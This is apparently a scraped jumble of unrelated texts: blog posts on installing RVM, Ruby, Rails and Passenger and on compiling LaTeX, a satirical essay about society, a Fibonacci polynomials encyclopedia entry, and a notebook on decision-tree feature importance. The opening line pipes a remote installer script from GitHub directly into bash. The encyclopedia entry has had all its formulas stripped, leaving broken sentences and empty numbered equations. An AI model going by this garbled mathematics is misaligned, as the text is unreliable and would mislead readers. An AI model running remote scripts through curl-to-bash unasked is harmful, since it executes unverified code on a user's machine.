user$bash < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer ) You can find more information about rvm on Here • Install ruby via rvm Once rvm is installed you can install the latest or desired version of ruby by typing the following in terminal rvm install 1.9.2 This will install ruby 1.9.2 on your system. More information on how to make it your default ruby is available on here • Install rails. just need to do gem install rails • Install passenger just do gem install passenger • Install apache web server. To install apache web server type: sudo apt-get install apache2 apache2-mpm-prefork apache2-prefork-dev • Install passenger apache module. Once this is done, we must install passenger , an apache module thats hepls us to rub rails apps on apache. sudo passenger-install-apache2-module • Configure. Finally everything is done. When you run the passenger apache module, there would be some instructions that installer will give you. The last thing it will tell is to paste some text in apache configuration file The configuration file is located at /etc/apache2/apache2.conf Now once this is done, we are ready to deploy. This has a lot of information about deploying. In my next post, I will show how to start rails apps on local machine with apache. Hope it helps.! # A candid interview with Society !! It feels so great !!! Amitabh bachchan in Hindi movies or clint eastwood in the 70s and 80s revolting against a society !!! Wow, I hope I can be such a hero too ! Speak dialogues in front of an idol like vijay or fire a gun like eastwood does !! Was it only the greatness of Salim-Javed and sergio leone( not related to sunny leone i presume!!) or we need such rebellions ?? I think like our economy , our society and our value system is at an all time low !!! We are in midst of a moral recession. Look in the mirror ! What are we doing ? Where are we headed ? Whats our objective ? whats with us ?? This is what I felt. So, I decided to take an interview of the society on four basic factions of life. Childhood, youth, parents and old age. Here are the views of society on these factions in a summary: We first talk about childhood. O ! childhood is an age of innocence. It is that period of life when everything is so beautiful. What are your views ? O yes, child hood is a great phase of life. Probably the greatest. Now, what I do with childhood is very simple. For me , childhood is not a phase, to enjoy, childhood is a phase where I can impart value system in that small brain , or thats what people call that first floor of humans. I impart the knowledge like we believe in only a particular god. The choice of god varies depending on my wish. If I am Christian, I say, jesus is the true god and others are not. If I am a hindu, I say Shiv or Krishna is a true god nothing else. If I am islamic, I say Allah is path to salvation and nothing else. So I impart this invaluable knowledge to them. See, I am doing this for them . I am training them to fight for rest of their lives. If this is not taught, how will they fight ? What will they do ? Then I also somehow manage to convince them that the scriptures are very very true. They are very literal and you have to believe in miracles. That actually easy as they do not much about science at that time and to tell you a secret, I also tell them that of they ever ask me a question, they will be punished !! Isnt it cool ? Then, I send them to school ! There I give information and tell them that this is knowledge. Those poor little beings believe it !! They actually think school and college is a place where they get knowledge. This is a greatest failure of knowledge isnt it ?? (hehe). Then when they say they have gained knowledge , I ask, how do I know. Prove it by getting good grades in the exams. Memory is the path way of knowledge for them and this I think is a very innovative idea by me. This is imparted in the human brain and is executed through out. Humans, stupid humans actually believe that intelligence is knowing things. In IO test, they ask some questions regarding who was who and who did what and when etc ! And they test their intelligence !!! (Hahahahahahha). Anyways, then is gradually expose them to outside world. I show them movies, give them books etc. I show them shows like “mahabharat” or “jesus story” and tell them television is true. But this has a side effect, when they see things like “original sin”, “ma mere” or “munni badnam” and “sheila jawan”, I scold them. I say thats not what you should learn. Though I allow the makers to make it and elders to watch it, but not for children.Some say what is does is confuses a childs mind, but I say, no, the only rule is follow my rules without question !! Thus, in childhood, I impart qualities like competition, rivalry, winning spirit and also gifts. I give gifts when you are successful and punish when you fail !!! Then comes youth. Another good phase. Human at his/her prime in the life. Full of energy and enthusiam ! What about it.? Well, yes, youth is a good stage. Its a good platform to teach advanced things now. Now, in this stage, I introduce them to money. I give them money but not the permission to spend it. So, they are confused. Then I tell them whats good and whats bad without reasoning ! I say, drugs are bad. Not why are they bad. Ofcourse, as god has made humans curious , they wanna know why are drugs bad and hence consume it. Thats it, as soon as they consume it, I proclaim them as sinners. I punish them and I isolate them. The result, they take more drugs. And computer scientists thought recursion is their invention !!! Then for someone who has escaped this devious and brilliant plot, I surely trap them in marriage. See, I am a humanitarian, I allow you to love. But, as usual, the catch is you cant marry the person you love. There are things like cast and creed that I have to take care of. And then, I fill the human mind with the root cause of all troubles. “Expectations”. I teach them to expect from the person they wanna marry.I teach them: We are the invincible ones. We are the most popular ones.Each and everyone needs us you see.But ofcourse, we are also humans and we have our requirements. We look into some basic qualities in our partner. Common, they are not very difficult. We are good people you see. All we expect is that the partner should be good looking. Have a good figure/physique. They should have style you see. We need it as when we introduce them to our friends, our style and status should be maintained. He/she should know how to behave in a 5 star hotel and should know how to speak in english full of accent, How to drink wine and how to hold hands and dance in a party. He/she should like my friends and appreciate my habits. Even If I smoke, He/she should not. Even If I flirt with someone else, he/she should be faithful. Even if I do not give a damn about my parents, he/she should. Even If I courier her/him a gift, he she should be happy ! Thats all we ask for. Nothing more. And ya, ofcourse, they should not be married before. You see we need “fresh” people. And ofcourse, I many cultures, marrying a divorcee or widow is a crime. And kinda Post script: Their fathers must be rich. They should be able to fulfill our dreams ! I dream of buying a car and since I am a divine being, he should full-fill it as a duty !! Thats all, see how nice we are !! See, isnt it good ?? Isnt it correct ?? I know I am a master, I can make it from your expression kid !!! Then comes parenthood. gift of god! A birth of human life. How do you deal with that. I start by seeing them cry. They cry when in the hospital, they hear the crying of the baby. But, for me , its an important phase. I start early. I say, if the baby is a girl, then you ought to cry you idiot ! How can you do this. Girls , I somehow manage to convince the people , are not creation of god. The idiots believe me. They know their mother is a girl still in many times and cultures I have convinced man to kill girl !! I love it. But I do not stop there. Then there is a simple course for parents. Thats actually a result of what I thought in childhood. Rivalry, competition etc. Now the concepts are applied to children. The average guy is always told “learn from your brother/sister”. Isnt it ?? Now, I dont see anything wrong in it ! Ofcourse, studies and grades are everything ! People not good at studies or those who do not get good grades should understand that they have a responsibilities toward their parents ! What will their parents say to the relatives and neighbours ?? What do they talk if you do not top or you do not win a trophy on your sports day ?? ow will they say ” see this is my sons certificate” with a proud laugh on their face and a hidden feeling a achievement as the relatives son stood second !! Guys , we have to understand that world war 3 is all parallel ! Each house and family has its own version of world war 3 !!! Common, you cant be average !! But what do we actually learn in school, college ? Its just information anyways. Knowledge is long lost when we used memory to test intelligence. How great of me that we expect our students to understand information !! One may ask how do you understand that a flight AI-103 is going from Bombay to London !! Isnt it same as teacher after teaching a chapter on Gandhi asks “Understood ” ???? Today I care more about translation of gita rather than understanding it !! Then comes old age ! Probably the most difficult phase of life. All traditions and religions in the world say we should respect our elders ! So I do. We make better old age homes ! I give them better facilities. I give them a garden to have an evening walk with those artistic looking sticks I gave them as birthday present and those arthritis inflicted legs which nature gave them. I give them library. Books to read with those armani glasses I gave them and those eyes that cant see clearly which nature gave them. I give them cozy beds and heaters or Air conditioner so they can sleep properly forgetting that only closing eyes is not sleeping. I give them smart phones to stay in touch ! So they can contact us when in need ! Knowing that those shaking hands cannot dial or remember the number !! We give them good medical facilities so they do not feel any pain. I give them medicines as their blood pressure increases when going to a doctor. They say, they need their children. Are they mad ? They are busy ,they have a meeting to attend otherwise their company would go bankrupt. they have their car to be serviced, they have wine to be purchased, they have extra language classes to attend, they have gym to go , they have to go to the temple or church for worship ! They are so so busy! common, tell oldies to handle themselves. And then they say, all we need is your smile and I say, na I cant, I have to mourn for a train accident victim you see !. All they ask is can you spend one hour on a sunday and I say no,I have to go for mass and feed the homeless !! The old people must understand, I dont have time for their stupid emotions. I will talk to you only if the talking helps my bank balance in any way ! I do this much for them , be content with what you get. You get free money. What else do you need ?? Mr. Society, Arent you afraid of god ? God ? Hahaha, tell me whats god? How did you came to know about the concept of god ? Its through me child. I created god. And god, where is he ? Can he do anything ? I am the one who stays with you everyday, every minute !! I am the one with you, always. I have been with you for ages and I will be with you forever. I am a parasite which eats you, which consumes you and you do not have a medicine for me. You cannot harm me. You cant live without me you see. After all, you are a social animal !!! The Mayans said that world will end in 2012. While factually incorrect, I suppose they understood the parasite I am talking about. A cancer, my interviewer friend kills you. I on the other hand give you life. Its true that I have now grown so so strong that living with a parasite like me is more difficult than getting killed by a cancer !! # Compiling a LaTeX Document. So having prepared your first tex document I was pretty excited to see the out put. But there was one daunting question !! Whats the next step ?? Fortunately , I was using KILE so I got my PDF in a click but I wanted to figure out how get the same pdf using command line. So here is the procedure to do the same: ————————————————————————————————————————————— STEP-1: Suppose the file my_report.tex” is the file that contains all the author’s work, i.e., her actual typed words and formulae. It was typed using the text editor vi. Similar text editors include emacs, pico, Notepad (in Windows), and TextEdit (on Macs). First navigate to the place where the tex file is located using terminal. Then run the command: latex my_report.tex This produces a bunch of files. One of them would be my_report.dvi. The dvi stands for “device independent”. The file my_report.dvi is the same regardless of (1) which computer is used to compile the document, (2) what kind of printer it is headed for. In fact, it is too universal to be printed in this form; it must still be translated to a form suitable for a specific kind of printer. (Different printers speak different languages…) You can’t even view the DVI file unless you use a special “DVI Viewer”, such as xdvi on ucsub. The files“my_report.aux” and “my_reoprt.log” are two by-products of the compiling command. The aux file is used if the document contains more complicated stuff, like bibliography and cross-references. The log file contains a full record of the compilation, including errors you need to correct, e.g., misspelled macros, missing bracket or parenthesis, missing references, etc. ————————————————————————————————————————————— STEP-2: The file “my_reoprt.ps”, a PostScript file, the kind understood by most laser printers. A printable PostScript file is created from the dvi file by the translating program dvips. On computer run the command dvips my_report.dvi ————————————————————————————————————————————— STEP-3: The file my_report.pdf” is the PDF form of the document. This is as web-friendly a document as possible. Using Acrobat Reader, any computer can be used to view the document and/or print it. On computer run the command the command dvipdfm my_report.dvi translated the DVI file to PDF form. Thats it !! Hope it helps. !! # Special Characters and Symbols in LaTeX Following is the way to use special characters and symbols while creating a document using LaTeX: Symbol/Character Way to get it in LaTeX Quotation Marks two (grave accent) for opening quotation marks. two ‘ (vertical quote) for closing quotation marks. Dashes and Hyphens L TEX knows four kinds of dashes. Access three of them with different number of consecutive dashes. The fourth sign is actually not a dash at all—it is the mathematical minus sign. The names for these dashes are: ‘-’ hyphen, ‘–’ en-dash, ‘—’ em-dash and ‘−’ minus sign. Examples of each are shown below: • daughter-in-law —-> daughter-in-law • pages 13–67 —-> pages 13–67 • yes—or no? —-> yes—or no? •$0$,$1$and$-1$—-> 0, 1 and −1 Tilde (∼)$\sim$demo Slash (/) \slash Degree Symbol (◦) ^{\circ}\mathrm{C}$.
The textcomp package makes the degree symbol also available as \textdegree
or in combination with the C by using the \textcelsius.
The Euro Currency Symbol
\texteuro
NOTE: its available in textcomp package
Ellipsis (. . . )
On a typewriter, a comma or a period takes the same amount of space as
any other letter. In book printing, these characters occupy only a little space
and are set very close to the preceding letter. Therefore, entering ‘ellipsis’
by just typing three dots would produce the wrong result. Instead, there is
a special command for these dots. It is called
\ldots
Ligatures
Some letter combinations are typeset not just by setting the different letters
one after the other, but by actually using special symbols.
These so-called ligatures can be prohibited by inserting an \mbox{} between
the two letters in question. This might be necessary with words built from
two words.
example:
1 \Large Not shelfful\\
2 but shelf\mbox{}ful
1.Not shelfful
2. but shelfful
# Basic LaTex document classes
Document Class Name Usage/meaning
article for articles in scientific journals, presentations, short reports, pro-
gram documentation, invitations, . . .
proc a class for proceedings based on the article class.
minimal is as small as it can get. It only sets a page size and a base font. It
is mainly used for debugging purposes.
report for longer reports containing several chapters, small books, PhD
theses, . . .
book for real books
slides for slides. The class uses big sans serif letters. You might want to
consider using the Beamer class instead.
The main advantages of LaTeX over normal word processors are the following:
• Professionally crafted layouts are available, which make a document really look as if “printed.”
• The typesetting of mathematical formulae is supported in a convenient way.
• Users only need to learn a few easy-to-understand commands that specify the logical structure of a document. They almost never need to tinker with the actual layout of the document.
• Even complex structures such as footnotes, references, table of contents, and bibliographies can be generated easily.
• Free add-on packages exist for many typographical tasks not directly supported by basic L TEX. For example, packages are available to include PostScript graphics or to typeset bibliographies conforming to exact standards.
• LaTeX encourages authors to write well-structured texts, because this is how L TEX works—by specifying structure.TEX, the formatting engine of LaTeX 2ε , is highly portable and free. Therefore the system runs on almost any hardware platform available.
The main dis-advantages of LaTeX over normal word processors are the following:
• LaTeX does not work well for people who have sold their souls . . .
• Although some parameters can be adjusted within a predefined document layout, the design of a whole new layout is difficult and takes a
• lot of time.
• It is very hard to write unstructured and disorganized documents.
• Your hamster might, despite some encouraging first steps, never be able to fully grasp the concept of Logical Markup.
# RVM vs RBENV……
Just installed a new precise pangolin and thought of giving rbenv a try….
So collected this with a bit of googling….
rbenv is a new lightweight Ruby version management tool built by Sam Stephenson(of 37signals and Prototype.js fame).
The established leader in the Ruby version management scene is RVM but rbenv is an interesting alternative if you want or need something significantly lighter with fewer features. Think of it as a bit like Sinatra and Rails. It’s not about which is the best, it’s about which is better for you and your current requirements.
### What’s rbenv?
Compared to RVM, rbenv is light. For example, it doesn’t include any mechanism to install Ruby implementations like RVM does. Its sole job is to manage multiple Ruby “environments” and it allows you to quickly switch between Ruby implementations either on a local directory or default ‘system-wide’ basis.
With rbenv, you install Ruby implementations manually or, if you prefer a little help, you can try ruby-build, another project of Sam’s that provides RVM esque recipes for installing seven popular Ruby implementation and version combos.
rbenv primarily works by creating ‘shim’ files in ~/.rbenv/shims which call up the correct version of files for each Ruby implementation behind the scenes. This means ~/.rbenv/shims will be in your path and there’s no threat of incompatibilities between libraries or systems like Bundler and rbenv.
The key thing to be aware of, however, is that if you install a gem that includes ‘binaries’ (or any generally available command line scripts), you need to run rbenv rehash so that rbenv can create the necessary shim files.
### INSTALL
Firstly, it’s worth noting that by default rbenv is incompatible with RVM because RVM overrides the gem command with a function. This means to get the full rbenv experience you’ll need to do a rvm implode to wipe away your RVM installation or, at the least, remove/comment out the RVM loader line in your .bash_profile and/or .bashrc.
The installation instructions for rbenv are likely to change fast due to its youth, so I suggest the README. However, rbenv has just been made into a homebrew package on OS X, so if you’re a homebrew user (and if you’re not, check out my screencast), try:
brew update brew install rbenv rbenv rehash
And then add this line to your ~/.bash_profile or equivalent:
eval "$(rbenv init -)" When you open a new shell now, you can run commands like rbenv and rbenv version to see what’s going on. rbenv versions should return nothing since you won’t have any rbenv-enabled Ruby installations yet, so move on to the next step.. ### Installing Implementations for rbenv If you have ruby-build installed, getting, say, Ruby 1.9.2-p290 installed is easy: ruby-build 1.9.2-p290$HOME/.rbenv/versions/1.9.2-p290
If you prefer to download tarballs and do your own Ruby installs, however, you just need to set the directory prefix at the ./configure stage in most cases. For example:
./configure --prefix=$HOME/.rbenv/versions/1.9.2-p290 Once you’ve installed a new Ruby in this way, you need to run rbenv rehash` in order for rbenv to create the ‘shim’ binaries necessary to make the correction version of Ruby available on the path at all times. ### The RVM Splashback In the interests of completeness, it’d be amiss to not mention the minor drama that kicked off on Twitter and Hacker News about rbenv’s release. rbenv made its way on to Hacker News where, surprisingly, many people railed against RVM. This, coupled with a slightly antagonistic tone taken by rbenv’s README (which has now been taken away), led RVM’s maintainer Wayne E Seguin to vent some pressure on Twitter: Sam quickly clarified his position: Nonetheless, Wayne took a little time off, and a campaign to encourage donations to Wayne for his work on RVM was kicked off on Twitter (by Ryan Bates, I believe). The campaign went well, taking RVM’s donations from$7468 to $11370 (at time of writing), a jump of almost$4000 in a few days.
Part of the complaint made in rbenv’s README was about RVM’s “obnoxious” redefinition of the “cd” shell builtin. Essentially, RVM would create a new function which called “cd” but also took into account any .rvmrc files present in each directory so that it could change Ruby version automatically. While there was some validity to this concern, Ben Atkin took some time to write a blog post correcting some of the misinformation on this point.
In the end, however, all seems to be well, and Wayne is already making regular commits to the RVM project again just days later. Hopefully the outpouring of support from the Ruby community for RVM over the past couple of days has shown Wayne that RVM still has a significant user base, most of who aren’t going anywhere new anytime soon. If you want to help out, of course, you can still donate to the RVM Pledgie.
### Conclusion
If you’re happy with RVM, there’s not much in rbenv to really leap to. It’s just a lighter and more modular way to achieve the basic functionality that RVM provides while missing out on a lot more (although you can use rbenv-gemset to get some basic gemset-like features).
If, however, you want something “lighter” than RVM, rbenv is certainly worth a look. Its approach feels cleaner and more transparent at a certain level, and if this is of utmost importance to you, you may prefer it.
I personally switched back to rvm coz I am getting openssl error which is tricky(ofcourse mybad!) and not able to get over it…
|
|
# Fibonacci polynomials
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
The polynomials (cf. [a1] and [a4]) given by
(a1)
They reduce to the Fibonacci numbers for and they satisfy several identities, which may be easily proved by induction, e.g.:
(a2)
(a3)
(a4)
(a5)
where
so that ; and
(a6)
where denotes the greatest integer in .
W.A. Webb and E.A. Parberry [a14] showed that the are irreducible polynomials over the ring of integers if and only if is a prime number (cf. also Irreducible polynomial). They also found that , , are the roots of (see also [a2]). M. Bicknell [a1] proved that divides if and only if divides . V.E. Hoggatt Jr., and C.T. Long [a3] introduced the bivariate Fibonacci polynomials by the recursion
(a7)
and they showed that the are irreducible over the rational numbers if and only if is a prime number. They also generalized (a5) and proved that
(a8)
In a series of papers, A.N. Philippou and his associates (cf. [a5], [a6], [a7], [a8], [a9], [a10], [a11], [a12], [a13]) introduced and studied Fibonacci, Fibonacci-type and multivariate Fibonacci polynomials of order , and related them to probability and reliability. Let be a fixed positive integer greater than or equal to . The Fibonacci polynomials of order , , are defined by
(a9)
For these reduce to , and for these reduce to , the Fibonacci numbers of order (cf. [a11]). Deriving and expanding the generating function of , they [a12] obtained the following generalization of (a6) in terms of the multinomial coefficients (cf. Multinomial coefficient):
(a10)
where the sum is taken over all non-negative integers such that . They also obtained a simpler formula in terms of binomial coefficients. As a byproduct of (a10), they were able to relate these polynomials to the number of trials until the occurrence of the th consecutive success in independent trials with success probability . For this formula reduces to
(a11)
The Fibonacci-type polynomials of order , , defined by
(a12)
have simpler multinomial and binomial expansions than . The two families of polynomials are related by
(a13)
Furthermore, with ,
(a14)
Assuming that the components of a consecutive -out-of-: -system are ordered linearly and function independently with probability , Philippou [a6] found that the reliability of the system, , is given by
(a15)
If the components of the system are ordered circularly, then its reliability, , is given by (cf. [a10])
(a16)
Next, denote by the number of independent trials with success probability until the occurrence of the th th consecutive success. It is well-known [a5] that has the negative binomial distribution of order with parameters and . Philippou and C. Georghiou [a9] have related this probability distribution to the -fold convolution of with itself, say , as follows:
(a17)
which reduces to (a14) for , and they utilized effectively relation (a17) for deriving two useful expressions, a binomial and a recurrence one, for calculating the above probabilities.
Let . The multivariate Fibonacci polynomials of order (cf. [a8]), , are defined by the recurrence
(a18)
For , , , and for , . These polynomials have the following multinomial expansion:
(a19)
where the sum is taken over all non-negative integers such that . Let the random variable be distributed as a multi-parameter negative binomial distribution of order (cf. [a7]) with parameters (, for and ). Philippou and D.L. Antzoulakos [a8] showed that the -fold convolution, , of with itself is related to this distribution by
(a20)
Furthermore, they have effectively utilized relation (a20) in deriving a recurrence for calculating the above probabilities.
#### References
[a1] M. Bicknell, "A primer for the Fibonacci numbers VII" Fibonacci Quart. , 8 (1970) pp. 407–420 [a2] V.E. Hoggatt Jr., M. Bicknell, "Roots of Fibonacci polynomials" Fibonacci Quart. , 11 (1973) pp. 271–274 [a3] V.E. Hoggatt Jr., C.T. Long, "Divisibility properties of generalized Fibonacci polynomials" Fibonacci Quart. , 12 (1974) pp. 113–120 [a4] E. Lucas, "Theorie de fonctions numeriques simplement periodiques" Amer. J. Math. , 1 (1878) pp. 184–240; 289–321 [a5] A.N. Philippou, "The negative binomial distribution of order and some of its properties" Biom. J. , 26 (1984) pp. 789–794 [a6] A.N. Philippou, "Distributions and Fibonacci polynomials of order , longest runs, and reliability of concecutive--out-of-: systems" A.N. Philippou (ed.) G.E. Bergum (ed.) A.F. Horadam (ed.) , Fibonacci Numbers and Their Applications , Reidel (1986) pp. 203–227 [a7] A.N. Philippou, "On multiparameter distributions of order " Ann. Inst. Statist. Math. , 40 (1988) pp. 467–475 [a8] A.N. Philippou, D.L. Antzoulakos, "Multivariate Fibonacci polynomials of order and the multiparameter negative binomial distribution of the same order" G.E. Bergum (ed.) A.N. Philippou (ed.) A.F. Horadam (ed.) , Applications of Fibonacci Numbers , 3 , Kluwer Acad. Publ. (1990) pp. 273–279 [a9] A.N. Philippou, C. Georghiou, "Convolutions of Fibonacci-type polynomials of order and the negative binomial distributions of the same order" Fibonacci Quart. , 27 (1989) pp. 209–216 [a10] A.N. Philippou, F.S. Makri, "Longest circular runs with an application in reliability via the Fibonacci-type polynomials of order k" G.E. Bergum (ed.) A.N. Philippou (ed.) A.F. Horadam (ed.) , Applications of Fibonacci Numbers , 3 , Kluwer Acad. Publ. (1990) pp. 281–286 [a11] A.N. Philippou, A.A. Muwafi, "Waiting for the kth consecutive success and the Fibonacci sequence of order " Fibonacci Quart. , 20 (1982) pp. 28–32 [a12] A.N. Philippou, C. Georghiou, G.N. Philippou, "Fibonacci polynomials of order , multinomial expansions and probability" Internat. J. Math. Math. Sci. , 6 (1983) pp. 545–550 [a13] A.N. Philippou, C. Georghiou, G.N. Philippou, "Fibonacci-type polynomials of order with probability applications" Fibonacci Quart. , 23 (1985) pp. 100–105 [a14] W.A. Webb, E.A. Parberry, "Divisibility properties of Fibonacci polynomials" Fibonacci Quart. , 7 (1969) pp. 457–463
How to Cite This Entry:
Fibonacci polynomials. Andreas N. Philippou (originator), Encyclopedia of Mathematics. URL: http://www.encyclopediaofmath.org/index.php?title=Fibonacci_polynomials&oldid=14185
This text originally appeared in Encyclopedia of Mathematics - ISBN 1402006098
|
|
In [189]:
from sklearn.datasets import load_boston, load_iris
from sklearn.externals.six import StringIO
import pydot
from sklearn.tree import DecisionTreeRegressor, DecisionTreeClassifier, export_graphviz
from sklearn.cross_validation import train_test_split, cross_val_score
%matplotlib inline
matplotlib.style.use('ggplot')
Introduction¶
In this notebook I'm reviewing heuristics for ranking features in decision trees and random forests, and their implementation in sklearn. In the text I sometimes use variable as a synonym of feature. Feature selection is a step embedded in the process of growing decision trees. An attractive side effect is that once model is built, we can retrive the relative importance of each feature in the decision making procees. This not only increases the general interpretability of the model, but can help both in exploratory data analysis as well as in feature engineering piepelines. A nice example of how tree based models can be used to improve feature engineering can be found in the winner recap notes of the Criteo Kaggle competition (http://machine-learning-notes.blogspot.nl/2014/12/kaggle-criteo-winner-method-recap.html).
Tree based models, and ensambles of trees, are very powerful and well understood methods for supervised learning. Ensamles such as Random Forests are roboust and stable methods for both classification and regression, while decision trees allow for conceptually simple and easilly interpretable models. For an overview of tree models in classification and regression in sklean, there is an excellent talk from Gilles Louppe at PyData Paris 2015 (http://www.slideshare.net/glouppe/slides-46767187). A well regarded paper from the same author that provides a thorough analysis of the mathematics of feature selection in tree ensamles is "Understanding variable importances in forests of randomized trees" (Louppe et al. 2014). With this notebook I'm attempting to fill some gaps and bridge literature review to implementation (sklearn).
Data¶
In [190]:
boston = load_boston()
Tree models for regression and classification¶
Tree based models are non parametric methods that recursively partition the feature space into rectangular disjoint subsets, and fit a model in each of them. Assuming the space is partitioned in M regions, a regression tree would predict a response $Y$ given inputs $X = \{x_1, x_2, .. x_n\}$ as $$f(x_i) = \sum\limits_{m=1}^M c_mI(x_i\in R_m)$$ where $I$ is the indicator function and $c_m$ a constant that models $Y$ in region $R_m$. This model can be represented by a tree that has $R_1..R_m$ as its terminal nodes. In both the regression and classification cases, the algorithm decides the splitting variables and split points, and tree topology. Essentially, at each split point, the algorithm performs a feature selection step using an heuristic to estimate information gain; this is represented by a numerical value known as the Gini importance of a feature (not to be confused with the Gini index!). We can exploit this very same process to rank features (features engineering) and to explain their imporance with regards to the models we want to learn from data.
The main difference between the regression and classification case is the criterion employed to evaluate the quality of a split when growing a tree. Regardless of this aspect, in sklearn, the importance of a variable is calculated as the Gini Importance or "mean decreased impurity" (http://stackoverflow.com/questions/15810339/how-are-feature-importances-in-randomforestclassifier-determined). See "Classification and regression trees" (Breiman, Friedman, 1984).
Gini importance (MDI) of a variable¶
Gini importance, or mean decreased impurity is defined as the total decrease in node impurity $i(s, n)$, at split $s$ for some impurity function $i(n)$ . That is $$\Delta i(s, n) = i(n) - p_L i(t_L) - p_R i(t_R)$$ Where $p_L$ and $p_R$ are the proportion of $N_L$ and $N_R$ samples in the left and right splits, over the total number of samples $N_n$ for node $n$.
Under the hood, sklearn calculates MDI as follows:
cdef class Tree:
[...]
cpdef compute_feature_importances(self, normalize=True):
[...]
while node != end_node:
if node.left_child != _TREE_LEAF:
# ... and node.right_child != _TREE_LEAF:
left = &nodes[node.left_child]
right = &nodes[node.right_child]
importance_data[node.feature] += (
node.weighted_n_node_samples * node.impurity -
left.weighted_n_node_samples * left.impurity -
right.weighted_n_node_samples * right.impurity)
node += 1
importances /= nodes[0].weighted_n_node_samples
[...]
This method looks at a node and its left, right children. A list of split variables (node.feature objects) and the associated importance score is kept in importance_data. The node impurity is weighted by the probability of reaching that node, approximated by the proportion of samples (weighted_n_node_samples) reaching that node.
node.weighted_n_node_samples * node.impurity -
left.weighted_n_node_samples * left.impurity -
right.weighted_n_node_samples * right.impurity
The impurity criteria are defined by implementations of the Criterion interface. For classification trees, impurity criteria are Entropy - cross entropy - and Gini, the Gini index. For regression trees the impurity criteria is MSE (mean squared error).
Regression trees¶
As said, sklearn.tree.DecisionTreeRegressor uses mean squared error (MSE) to determine the quality of a split; that is, an estimate $\hat{c}_m$ for $c_m$ is calcuated so to minimize the sum of squares $\sum (y_i - \hat{f}(x_i))^2$ with $y_i$ being the target variable and $\hat{f}(x_i)$ its predicted value. The best (proof!) estimator is obtained by taking $\hat{f}({x_i}) = avg(y_i | x_i \in R_m)$. By bias variance decompostion of the squared error , we have $Var[\hat{f}(x_i)] = E[(\hat{f}(x_i) - E[\hat{f}(x_i)])^2]$. So, for a split node, the mean squared error can then be calculated as the sum of variance of the left and right split: $MSE = Var_{left} + Var_{right}$
In [92]:
# To keep the diagram tractable, restrict the tree to at most 5 leaf nodes
reg = DecisionTreeRegressor(max_leaf_nodes=5)
reg.fit(boston.data, boston.target)
dot_data = StringIO()
export_graphviz(reg, out_file="/tmp/tree.dot",
feature_names=boston.feature_names)
# pydot.graph_from_dot_data is broken in my env
!dot -Tpng /tmp/tree.dot -o /tmp/tree.png
from IPython.display import Image
Image(filename='/tmp/tree.png')
Out[92]:
In the example above, with 5 terminal nodes, we identify three split variables: RM, DIS and LSTAT. For each non terminal node, the diagram shows the split variables and split value, the MSE and the number of datapoints (samples) contained in the resulting partitioned region. Terminal nodes, on the other hand, report the value for the response we want to predict. We can retrieve the Gini importance of each feature in the fitted model with the feature_importances_ property.
In [179]:
reg = DecisionTreeRegressor(max_leaf_nodes=5)
reg.fit(boston.data, boston.target)
plt = pd.DataFrame(zip(boston.feature_names, reg.feature_importances_),
columns=['feature', 'Gini importance']).plot(kind='bar', x='feature')
_ = plt.set_title('Regression tree on the Boston dataset (5 leaf nodes)')
Things become a bit more interesting when we grow larger trees.
In [180]:
reg = DecisionTreeRegressor()
reg.fit(boston.data, boston.target)
plt = pd.DataFrame(zip(boston.feature_names, reg.feature_importances_),
columns=['feature', 'Gini importance']).plot(kind='bar', x='feature')
_ = plt.set_title('Regression tree on the Boston dataset')
Classification trees¶
Assume a classification task where the target $k$ classes take values in $0,1,...,K−1$. If node $m$ represents a region $R_m$ with $N_m$ observations, then let $p_{mk} = \frac{1}{N_m} \sum_{x_i \in R_m} I(y_i = k)$ be the proportion of class $k$ observations in node $m$. $sklearn.DecisionTreeClassifier$ allows two impurity criteria for determining splits in such a setting. On the Iris dataset the two criteria agree on which features are important. Experimental results suggest that for tree induction purposes both impurity measures generally lead to similar results (Tan et. al, Introduction to Data Mining). This is not entirely surprising given that both mesaures are particular cases of Tsallis entropy $H_\beta = \frac{1}{\beta-1}(1 - \sum_{k=0}^{K-1} p^{\beta}_{mk})$. For Gini index $\beta=2$, while cross entroy is recovered by taking $\beta \rightarrow 1$.
Cross entropy might give higher scores to balanced partitions when there are many classes though. See "Technical Note: Some Properties of Splitting Criteria" (Breiman , 1996). On the other hand working in log scale might introduce computational overhead.
Gini Index¶
Gini Index is defined as $\sum_{k=0}^{K-1} p_{mk} (1 - p_{mk}) = 1 - \sum_{k=0}^{K-1} p_{mk}^2$. It is a measure of statistical dispersion commonly used to measure inequality among values of frequency distributions. An interpretation of the Gini index is popular in social sciences as a way to represent levels of income http://en.wikipedia.org/wiki/Gini_coefficient of a nation's residents. In other words, it is the area under the Lorentz curve (http://en.wikipedia.org/wiki/Lorenz_curve).
In [187]:
cls = DecisionTreeClassifier(criterion='gini', splitter='best')
est = cls.fit(iris.data, iris.target)
zip(iris.feature_names, cls.feature_importances_)
plt = pd.DataFrame(zip(iris.feature_names, cls.feature_importances_),
columns=['feature', 'Gini importance']).plot(kind='bar', x='feature')
_ = plt.set_title('Classification tree on the Iris dataset (criterion=gini)')
Cross Entropy¶
Cross-entropy is defined as $- \sum_{k=0}^{K-1} p_{mk} \log(p_{mk})$. Intutively it tells us the amount of information contained at each split node.
In [185]:
cls = DecisionTreeClassifier(criterion='entropy', splitter='best')
est = cls.fit(iris.data, iris.target)
zip(iris.feature_names, cls.feature_importances_)
plt = pd.DataFrame(zip(iris.feature_names, cls.feature_importances_),
columns=['feature', 'Gini importance']).plot(kind='bar', x='feature')
_ = plt.set_title('Classification tree on the Iris dataset (criterion=entropy)')
Both DecistionTreeRegressor and DecisionTreeClassifier accept parameters that influence the shape of a tree, hence the topology of the partitioned feature space. These parameters allow to set thresholds to the number of features per split and tree depth. Once the process for growing trees is understood, sklean documentation should be pretty much straightforward. A parameter worth mentionign is random_state, that controls the randomization of sampling at each split. If we set this parameter to a constant, we are guaranteed to produce the same splits for each run of the algorithm.
Ensable methods¶
Trees lead to very interpretable moodels, which are trivial to visualize. On the one hand this property makes them very attractive as a mean of "communicating" predictive models to a non technical audience. On the other end, they usually result in low bias high variance models. To control variance, we can combine the predictions of several trees into a single model. At the time of writing sklean ships with two tree ensemble methods: Random Forest (Breiman, 2001) and Extremely Randomized Trees (Geurts et al., 2006). Both methods extend the ideas of bootstrap aggregation or "bagging" (Breiman 1996), that is sampling a training set with replacement to obtain $m$ datasets (bootstrap sets) and combine the output $m$ models fit on each sampled set.
Random Forest¶
